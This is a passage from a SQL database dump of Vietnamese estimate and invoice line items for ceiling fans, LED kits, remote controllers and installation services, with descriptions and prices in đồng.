(483, 95, 'estimate', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', 'Điều khiển cầm tay rời', 3.00, 350000.00, '', 1, 0, NULL, 0.00),
(485, 97, 'estimate', 'Haiku L 44 inch White', 'không đèn led', 2.00, 18500000.00, '', 1, 0, NULL, 0.00),
(487, 96, 'estimate', 'Haiku L 44 inch White', 'Bộ đèn led Haiku rời giá 3.300.000', 1.00, 15725000.00, '', 1, 0, NULL, 0.00),
(488, 96, 'estimate', 'Bộ đèn LED quạt trần', 'Bộ đèn LED quạt trần Haiku L: 2700K', 1.00, 3300000.00, '', 2, 0, NULL, 0.00),
(489, 96, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Phí lắp đặt 500k', 1.00, 0.00, '', 3, 0, NULL, 0.00),
(490, 177, 'invoice', 'Haiku L 44 inch White', 'Bộ đèn led Haiku rời giá 3.300.000', 1.00, 15725000.00, '', 1, 0, NULL, 0.00),
(491, 177, 'invoice', 'Bộ đèn LED quạt trần', 'Bộ đèn LED quạt trần Haiku L: 2700K', 1.00, 3300000.00, '', 2, 0, NULL, 0.00),
(492, 177, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Phí lắp đặt 500k', 1.00, 0.00, '', 3, 0, NULL, 0.00),
(493, 178, 'invoice', 'Haiku L 44 inch White', 'không đèn led', 2.00, 18500000.00, '', 1, 0, NULL, 0.00),
(495, 98, 'estimate', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh: 132cm (52 inch)<br />\r\nThân quạt: Màu trắng (Matt White)<br />\r\nMàu sắc cánh: White Wood (màu trắng gỗ tự nhiên)<br />\r\nĐông cơ DC, công suất 35W<br />\r\nMóc treo: Low Profile &#40;lắp sát trần&#41;<br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(497, 99, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Gia cố móc ty treo từ bê tông - tấm thạch cao bằng ty ren. Phí 500k/móc', 1.00, 0.00, '', 1, 0, NULL, 0.00),
(499, 179, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Gia cố móc ty treo từ bê tông - tấm thạch cao bằng ty ren. Phí 500k/móc', 1.00, 0.00, '', 1, 0, NULL, 0.00),
(500, 100, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Sải cánh 142cm<br />\r\nĐộng cơ DC, 35W, BLDC tiết kiệm điện<br />\r\nMàu cánh: Dark Walnut<br />\r\nMàu thân: Matt Black<br />\r\nĐiều khiển 5 tốc độ đi kèm theo<br />\r\nThương hiệu: Tổ chức đào tạo WIT/China<br />\r\n', 2.00, 6500000.00, '', 1, 0, NULL, 0.00),
(501, 100, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Trần gỗ bắn móc treo trực tiếp<br />\r\n350k/móc', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(502, 180, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Sải cánh 142cm<br />\r\nĐộng cơ DC, 35W, BLDC tiết kiệm điện<br />\r\nMàu cánh: Dark Walnut<br />\r\nMàu thân: Matt Black<br />\r\nĐiều khiển 5 tốc độ đi kèm theo<br />\r\nThương hiệu: Tổ chức đào tạo WIT/China', 2.00, 6500000.00, '', 1, 0, NULL, 0.00),
(503, 180, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Trần gỗ bắn móc treo trực tiếp<br />\r\n350k/móc', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(504, 181, 'invoice', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', 'Điều khiển cầm tay rời', 3.00, 350000.00, '', 1, 0, NULL, 0.00),
(505, 99, 'estimate', 'Quạt trần HAMACHI 52 LED KOA', 'Số Cánh Quạt: 5 cánh <br />\r\nChất liệu cánh: Nhựa ABS <br />\r\nMàu sắc cánh: Black/KOA(vân gỗ) <br />\r\nMàu sắc động cơ: Black <br />\r\nNguồn Điện: 220V/50-60Hz <br />\r\nAir Flow (High Speed): 390 m3/min <br />\r\nĐiều Khiển: Remote Control DC 6 cấp độ kèm theo, sử dụng quay đổi chiều trực tiếp trên điều khiển  <br />\r\nCông Suất Động Cơ: 38W (DC tiêu chuẩn tiết kiệm điện, sử dụng công nghệ BLDC). <br />\r\nBộ LED: Led kit 18W với 3 chế độ màu (trắng - vàng - trung tính)  <br />\r\nSải Cánh (Đường Kính): 56inch/1420mm <br />\r\nThương hiệu/Xuất xứ: Mountain Air/China', 1.00, 6300000.00, '', 2, 0, NULL, 0.00),
(506, 179, 'invoice', 'Quạt trần HAMACHI 52 LED KOA', 'Số Cánh Quạt: 5 cánh <br />\r\nChất liệu cánh: Nhựa ABS <br />\r\nMàu sắc cánh: Black/KOA(vân gỗ) <br />\r\nMàu sắc động cơ: Black <br />\r\nNguồn Điện: 220V/50-60Hz <br />\r\nAir Flow (High Speed): 390 m3/min <br />\r\nĐiều Khiển: Remote Control DC 6 cấp độ kèm theo, sử dụng quay đổi chiều trực tiếp trên điều khiển  <br />\r\nCông Suất Động Cơ: 38W (DC tiêu chuẩn tiết kiệm điện, sử dụng công nghệ BLDC). <br />\r\nBộ LED: Led kit 18W với 3 chế độ màu (trắng - vàng - trung tính)  <br />\r\nSải Cánh (Đường Kính): 56inch/1420mm <br />\r\nThương hiệu/Xuất xứ: Mountain Air/China', 1.00, 6300000.00, '', 2, 0, NULL, 0.00),
(507, 101, 'estimate', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)', 'Đường kính cánh: 132cm  <br />\r\nĐộng cơ: BLDC motor, công suất 35W  <br />\r\nBộ điều khiển từ xa <br />\r\nMàu sắc cánh: Maple Wood <br />\r\nMàu sắc thân quạt: White', 1.00, 4750000.00, '', 1, 0, NULL, 0.00),
(508, 101, 'estimate', 'Chi phí vận chuyển tới chân công trình', 'Vận chuyển theo giá AhaMove', 1.00, 150000.00, 'lots', 2, 0, NULL, 0.00),
(509, 182, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)', 'Đường kính cánh: 132cm  <br />\r\nĐộng cơ: BLDC motor, công suất 35W  <br />\r\nBộ điều khiển từ xa <br />\r\nMàu sắc cánh: Maple Wood <br />\r\nMàu sắc thân quạt: White', 1.00, 4750000.00, '', 1, 0, NULL, 0.00),
(510, 182, 'invoice', 'Chi phí vận chuyển tới chân công trình', 'Vận chuyển theo giá AhaMove', 1.00, 150000.00, 'lots', 2, 0, NULL, 0.00),
(511, 183, 'invoice', 'Gia cố ống ty nối dài - trụ ty dành cho quạt trần công nghiệp', 'chiều dài 2.5m<br />\r\nSơn tĩnh điện màu đen', 1.00, 500000.00, 'cái', 1, 0, NULL, 0.00),
(512, 102, 'estimate', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', '', 1.00, 800000.00, '', 1, 0, NULL, 0.00),
(513, 103, 'estimate', 'Quạt trần KATRINA 52 Gray Maple', 'Sải cánh 132cm ( ~ 52inch) <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth) <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng) <br />\r\nMàu cánh: Gỗ sáng (Maple Wood) <br />\r\nĐèn LED: 3 màu, 2700K - 3000K <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm <br />\r\n', 2.00, 6500000.00, '', 1, 0, NULL, 0.00),
(514, 184, 'invoice', 'Quạt trần KATRINA 52 Gray Maple', 'Sải cánh 132cm ( ~ 52inch) <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth) <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng) <br />\r\nMàu cánh: Gỗ sáng (Maple Wood) <br />\r\nĐèn LED: 3 màu, 2700K - 3000K <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 2.00, 6500000.00, '', 1, 0, NULL, 0.00),
(515, 185, 'invoice', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', 'Bộ điều khiển quạt 5 cấp độ', 1.00, 750000.00, '', 1, 0, NULL, 0.00),
(516, 185, 'invoice', 'Nhân công lắp đặt trần bê tông', 'Nhân công thay thế ', 1.00, 150000.00, '', 2, 0, NULL, 0.00),
(517, 104, 'estimate', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm<br />\r\nĐộng cơ DC, BLDC công suất 35W<br />\r\nMàu thân quạt: Matt White<br />\r\nMàu cánh: Gỗ sáng Solid Timber Wood<br />\r\nĐiều khiển 5 cấp đi kèm', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(518, 105, 'estimate', 'Quạt trần KATRINA 52 Gray Maple', 'Sải cánh 132cm ( ~ 52inch) <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth) <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng) <br />\r\nMàu cánh: Gỗ sáng (Maple Wood) <br />\r\nĐèn LED: 3 màu, 2700K - 3000K <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 2.00, 6500000.00, '', 1, 0, NULL, 0.00),
(519, 105, 'estimate', 'Phí tuỳ chỉnh màu sắc quạt', 'Màu sắc thân:  Matt Gray (màu xám nhạt)<br />\r\nMàu sắc cánh: Dark Walnut<br />\r\nMàu sắc ống ty: Black (đen mờ nhạt)', 2.00, 500000.00, '', 2, 0, NULL, 0.00),
(520, 105, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Lắp đặt chi phí hỗ trợ: 350k/bộ', 2.00, 0.00, '', 3, 0, NULL, 0.00),
(521, 106, 'estimate', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)', 'Đường kính cánh: 132cm  <br />\r\nĐộng cơ: BLDC motor, công suất 35W  <br />\r\nBộ điều khiển từ xa <br />\r\nMàu sắc cánh: Maple Wood <br />\r\nMàu sắc thân quạt: White', 1.00, 5600000.00, '', 1, 0, NULL, 0.00),
(522, 106, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Trần tấm thạch cao, phí gia cố móc ty treo 500K/quạt (chưa bao gồm dây nguồn)', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(523, 186, 'invoice', 'Quạt trần KATRINA 52 Gray Maple', 'Sải cánh 132cm ( ~ 52inch) <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth) <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng) <br />\r\nMàu cánh: Gỗ sáng (Maple Wood) <br />\r\nĐèn LED: 3 màu, 2700K - 3000K <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 2.00, 6500000.00, '', 1, 0, NULL, 0.00),
(524, 186, 'invoice', 'Phí tuỳ chỉnh màu sắc quạt', 'Màu sắc thân:  Matt Gray (màu xám nhạt)<br />\r\nMàu sắc cánh: Dark Walnut<br />\r\nMàu sắc ống ty: Black (đen mờ nhạt)', 2.00, 500000.00, '', 2, 0, NULL, 0.00),
(525, 186, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Lắp đặt chi phí hỗ trợ: 350k/bộ', 2.00, 0.00, '', 3, 0, NULL, 0.00),
(526, 187, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)', 'Đường kính cánh: 132cm  <br />\r\nĐộng cơ: BLDC motor, công suất 35W  <br />\r\nBộ điều khiển từ xa <br />\r\nMàu sắc cánh: Maple Wood <br />\r\nMàu sắc thân quạt: White', 1.00, 5600000.00, '', 1, 0, NULL, 0.00),
(527, 187, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Trần tấm thạch cao, phí gia cố móc ty treo 500K/quạt (chưa bao gồm dây nguồn)', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(528, 188, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường... <br />\r\nCông việc: <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 150000.00, 'cái', 1, 0, NULL, 0.00),
(529, 107, 'estimate', 'Haiku L 44 inch White', 'Sải cánh 112cm (44 inch)<br />\r\nĐộng cơ DC/EC, công suất 29W<br />\r\nThân và cánh quạt màu: Trắng<br />\r\nĐiều khiển 7 tốc độ đi kèm<br />\r\nThương hiệu: Haiku/USA<br />\r\n', 1.00, 15725000.00, '', 1, 0, NULL, 0.00),
(530, 107, 'estimate', 'Bộ đèn LED quạt trần', 'Module LED Haiku L series<br />\r\nÁnh sáng màu vàng ấm: 2700K<br />\r\nĐiều chỉnh 16 cấp độ sáng (theo dãi tầng màu)<br />\r\nChế độ bật/tắt', 1.00, 3800000.00, '', 2, 0, NULL, 0.00),
(531, 189, 'invoice', 'Haiku L 44 inch White', 'Sải cánh 112cm (44 inch)<br />\r\nĐộng cơ DC/EC, công suất 29W<br />\r\nThân và cánh quạt màu: Trắng<br />\r\nĐiều khiển 7 tốc độ đi kèm<br />\r\nThương hiệu: Haiku/USA', 1.00, 15725000.00, '', 1, 0, NULL, 0.00),
(532, 189, 'invoice', 'Bộ đèn LED quạt trần', 'Module LED Haiku L series<br />\r\nÁnh sáng màu vàng ấm: 2700K<br />\r\nĐiều chỉnh 16 cấp độ sáng (theo dãi tần màu sáng)<br />\r\nChế độ bật/tắt', 1.00, 3800000.00, '', 2, 0, NULL, 0.00),
(533, 190, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường... <br />\r\nCông việc: <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 250000.00, 'cái', 1, 0, NULL, 0.00),
(534, 108, 'estimate', 'Quạt trần SINO LED 52 Black Dark Wood', 'Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nMàu thân quạt: Matt Black(Đen sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(535, 108, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Lắp đặt trần thạch cao 500k/quạt', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(536, 191, 'invoice', 'Quạt trần SINO LED 52 Black Dark Wood', 'Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nMàu thân quạt: Matt Black(Đen sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(537, 191, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Lắp đặt trần thạch cao 500k/quạt', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(538, 109, 'estimate', 'Quạt trần KATRINA 52 Gray Maple', 'Sải cánh 132cm ( ~ 52inch) <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth) <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng) <br />\r\nMàu cánh: Gỗ sáng (Maple Wood) <br />\r\nĐèn LED: 3 màu, 2700K - 3000K <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm <br />\r\n', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(539, 109, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Lắp đặt trần chung cư - gia cố móc treo 500k/quạt', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(540, 192, 'invoice', 'Quạt trần KATRINA 52 Gray Maple', 'Sải cánh 132cm ( ~ 52inch) <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth) <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng) <br />\r\nMàu cánh: Gỗ sáng (Maple Wood) <br />\r\nĐèn LED: 3 màu, 2700K - 3000K <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(541, 192, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Lắp đặt trần chung cư - gia cố móc treo 500k/quạt', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(542, 193, 'invoice', 'Bộ điều khiển DC gắn tường vuông 6 tốc độ Tổ chức đào tạo WIT', 'Bộ điều khiển quạt', 1.00, 350000.00, '', 1, 0, NULL, 0.00),
(543, 110, 'estimate', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', 'Bộ điều khiển quạt CAVANI LED', 1.00, 750000.00, '', 1, 0, NULL, 0.00),
(544, 110, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường... <br />\r\nCông việc: <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 300000.00, 'cái', 2, 0, NULL, 0.00),
(545, 111, 'estimate', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK (màu vân gỗ)', 'Sải cánh 132cm<br />\r\nĐộng cơ DC, BLDC, công suất 35W<br />\r\nBộ điều khiển 6 cấp độ<br />\r\n<br />\r\n', 1.00, 5800000.00, '', 1, 0, NULL, 0.00),
(546, 194, 'invoice', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK (màu vân gỗ)', 'Sải cánh 132cm<br />\r\nĐộng cơ DC, BLDC, công suất 35W<br />\r\nBộ điều khiển 6 cấp độ', 1.00, 5800000.00, '', 1, 0, NULL, 0.00),
(547, 112, 'estimate', 'Haiku L 44 inch Black', 'Sải cánh: 112 cm<br />\r\nĐộng cơ EC tiết kiệm điện, hoạt động êm, công suất 36W<br />\r\nSố cánh: 3 cánh màu đen<br />\r\nMàu thân quạt: Đen<br />\r\nBộ điều khiển 7 cấp đã bao gồm<br />\r\nĐèn LED chưa bao gồm<br />\r\nModule Wi-Fi chưa bao gồm<br />\r\nThương hiệu: Haiku/USA', 1.00, 18500000.00, '', 1, 0, NULL, 0.00),
(548, 112, 'estimate', 'Haiku I 60 inch Black with SenseME', 'Sải cánh 152cm (60 inch)<br />\r\nĐộng cơ EC, công suất 29.3W tích hợp sẳn bộ cảm biến SenseME<br />\r\nMàu thân, cánh quạt: Đen<br />\r\nBộ điều khiển 7 cấp đã bao gồm<br />\r\nBộ đèn LED Tuỳ chọn.<br />\r\nThương hiệu: Haiku/USA', 1.00, 35300000.00, '', 2, 0, NULL, 0.00),
(549, 195, 'invoice', 'Haiku L 44 inch Black', 'Sải cánh: 112 cm<br />\r\nĐộng cơ EC tiết kiệm điện, hoạt động êm, công suất 36W<br />\r\nSố cánh: 3 cánh màu đen<br />\r\nMàu thân quạt: Đen<br />\r\nBộ điều khiển 7 cấp đã bao gồm<br />\r\nĐèn LED chưa bao gồm<br />\r\nModule Wi-Fi chưa bao gồm<br />\r\nThương hiệu: Haiku/USA', 1.00, 18500000.00, '', 1, 0, NULL, 0.00),
(550, 195, 'invoice', 'Haiku I 60 inch Black with SenseME', 'Sải cánh 152cm (60 inch)<br />\r\nĐộng cơ EC, công suất 29.3W tích hợp sẳn bộ cảm biến SenseME<br />\r\nMàu thân, cánh quạt: Đen<br />\r\nBộ điều khiển 7 cấp đã bao gồm<br />\r\nBộ đèn LED Tuỳ chọn.<br />\r\nThương hiệu: Haiku/USA', 1.00, 35300000.00, '', 2, 0, NULL, 0.00),
(551, 113, 'estimate', 'Bộ đèn LED quạt trần', 'Bộ đèn LED thay thế: Quạt Trần TOBAGO - 3000K, MODEL 7063A', 1.00, 500000.00, '', 1, 0, NULL, 0.00),
(552, 196, 'invoice', 'Bộ đèn LED quạt trần', 'Bộ đèn LED thay thế: Quạt Trần TOBAGO - 3000K, MODEL 7063A', 1.00, 500000.00, '', 1, 0, NULL, 0.00),
(553, 114, 'estimate', 'Bộ điều khiển AC 3 tốc độ Tổ chức đào tạo WIT', 'Điều khiển ShengQi<br />\r\n3 tốc độ<br />\r\nSử dụng cho động cơ quạt trần AC motor', 5.00, 550000.00, '', 1, 0, NULL, 0.00),
(554, 197, 'invoice', 'Bộ điều khiển AC 3 tốc độ Tổ chức đào tạo WIT', 'Điều khiển ShengQi<br />\r\n3 tốc độ<br />\r\nSử dụng cho động cơ quạt trần AC motor', 5.00, 550000.00, '', 1, 0, NULL, 0.00),
(556, 198, 'invoice', 'Haiku 52 inch Caramel Bamboo - Low Profile Black', 'Sải cánh 132cm (52 inch)   <br />\r\nMàu cánh: Caramel Bamboo    <br />\r\nMàu thân : Low Profile Black   <br />\r\nĐộng cơ EC, công suất 29.3W   <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm   <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)   <br />\r\nBộ đèn LED tuỳ chọn thêm   <br />\r\nThương hiệu: Haiku/USA', 1.00, 36800000.00, 'cái', 1, 0, 'https://hgphome.com/uploads/items/1843/thumb_hgphome_52caramel.jpg', 0.00),
(557, 115, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 3.00, 6500000.00, '', 1, 0, '', 0.00),
(558, 115, 'estimate', 'Quạt trần cao cấp IRIS 60 Black ABS', '', 1.00, 16800000.00, '', 2, 0, '', 0.00),
(559, 199, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 3.00, 4875000.00, '', 1, 0, NULL, 0.00);
INSERT INTO `tblitemable` (`id`, `rel_id`, `rel_type`, `description`, `long_description`, `qty`, `rate`, `unit`, `item_order`, `discount`, `item_image`, `wh_delivered_quantity`) VALUES
(560, 199, 'invoice', 'Quạt trần cao cấp IRIS 60 Black ABS', '', 1.00, 11760000.00, '', 2, 0, NULL, 0.00),
(561, 116, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Sải cánh 142cm (54inch)<br />\r\nĐộng cơ DC, 35W<br />\r\nMàu cánh: Dark Walnut<br />\r\nMàu Thân: Đen<br />\r\nĐiều khiển 5 cấp đã bao gồm<br />\r\nThiết kế ko đèn LED<br />\r\nThương hiệu Tổ chức đào tạo WIT/China', 1.00, 6300000.00, '', 1, 0, '', 0.00),
(562, 200, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Sải cánh 142cm (54inch)<br />\r\nĐộng cơ DC, 35W<br />\r\nMàu cánh: Dark Walnut<br />\r\nMàu Thân: Đen<br />\r\nĐiều khiển 5 cấp đã bao gồm<br />\r\nThiết kế ko đèn LED<br />\r\nThương hiệu Tổ chức đào tạo WIT/China', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(563, 117, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 1.00, 6500000.00, '', 1, 25, '', 0.00),
(566, 117, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Chi phí gia cố móc treo trần chung cư: 500k/quạt', 1.00, 500000.00, '', 2, 0, '', 0.00),
(567, 202, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(568, 202, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Chi phí gia cố móc treo trần chung cư: 500k/quạt', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(571, 118, 'estimate', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m5', 'Đường kính cánh: 8ft ft (2.4 m) <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum <br />\r\nTốc độ quay tối đa / Max Speed: 95 RPM (max speed) <br />\r\nNguồn điện / Input Power: 220-240 VAC, 1Φ, 50/60 Hz <br />\r\nĐiều khiển / Control: Remote Control for Wall <br />\r\nĐộ ồn / Sound at Max Speed: &lt;35 dBA <br />\r\nTrọng lượng: 18 kg <br />\r\nDiện tích bao phủ mát / Max Affected Area: 1,722 ft2 / 160 m2 <br />\r\nLưu lượng luồng gió: 24,500 CFM (41,596 m3/h) <br />\r\n <br />\r\nCông suất động cơ / Power Consumption: 84 W (tiết kiệm điện 90% so với động cơ AC thường ở cùng sải cánh) <br />\r\nĐẶT ĐIỂM CHUNG - QUẠT TRẦN POWERFUL S1 <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum <br />\r\nPhụ kiện an toàn kèm theo, bộ phụ kiện lắp cánh quạt đã bao gồm <br />\r\nTuỳ chọn: điều khiển Modbus quản lý tập trung BMS. Liên hệ nhà cung cấp tư vấn <br />\r\nThương hiệu: SUNON/ Taiwan (thiết kế sản xuất 100% Taiwan)', 1.00, 32800000.00, '', 1, 20, NULL, 0.00),
(573, 203, 'invoice', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m5', 'Đường kính cánh: 8ft ft (2.4 m) <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum <br />\r\nTốc độ quay tối đa / Max Speed: 95 RPM (max speed) <br />\r\nNguồn điện / Input Power: 220-240 VAC, 1Φ, 50/60 Hz <br />\r\nĐiều khiển / Control: Remote Control for Wall <br />\r\nĐộ ồn / Sound at Max Speed: &lt;35 dBA <br />\r\nTrọng lượng: 18 kg <br />\r\nDiện tích bao phủ mát / Max Affected Area: 1,722 ft2 / 160 m2 <br />\r\nLưu lượng luồng gió: 24,500 CFM (41,596 m3/h) <br />\r\n <br />\r\nCông suất động cơ / Power Consumption: 84 W (tiết kiệm điện 90% so với động cơ AC thường ở cùng sải cánh) <br />\r\nĐẶT ĐIỂM CHUNG - QUẠT TRẦN POWERFUL S1 <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum <br />\r\nPhụ kiện an toàn kèm theo, bộ phụ kiện lắp cánh quạt đã bao gồm <br />\r\nTuỳ chọn: điều khiển Modbus quản lý tập trung BMS. Liên hệ nhà cung cấp tư vấn <br />\r\nThương hiệu: SUNON/ Taiwan (thiết kế sản xuất 100% Taiwan)', 1.00, 32800000.00, '', 1, 20, NULL, 0.00),
(575, 119, 'estimate', 'Haiku Outdoor Black Aluminum', 'Sải cánh 210cm', 2.00, 65488500.00, '', 1, 0, '', 0.00),
(576, 119, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 6.00, 6500000.00, '', 2, 25, '', 0.00),
(577, 119, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 2500000.00, '', 3, 0, '', 0.00),
(578, 204, 'invoice', 'Haiku Outdoor Black Aluminum', 'Sải cánh 210cm<br />\r\nMàu thân quạt: Đen<br />\r\nMàu cánh: Đen<br />\r\nThiết kế tiêu chuẩn ngoài trời, chống ẩm, nước IPX2<br />\r\nThương hiệu xuất xứ: Haiku/USA', 2.00, 65488500.00, '', 1, 0, NULL, 0.00),
(580, 204, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 2500000.00, '', 2, 0, NULL, 0.00),
(581, 120, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 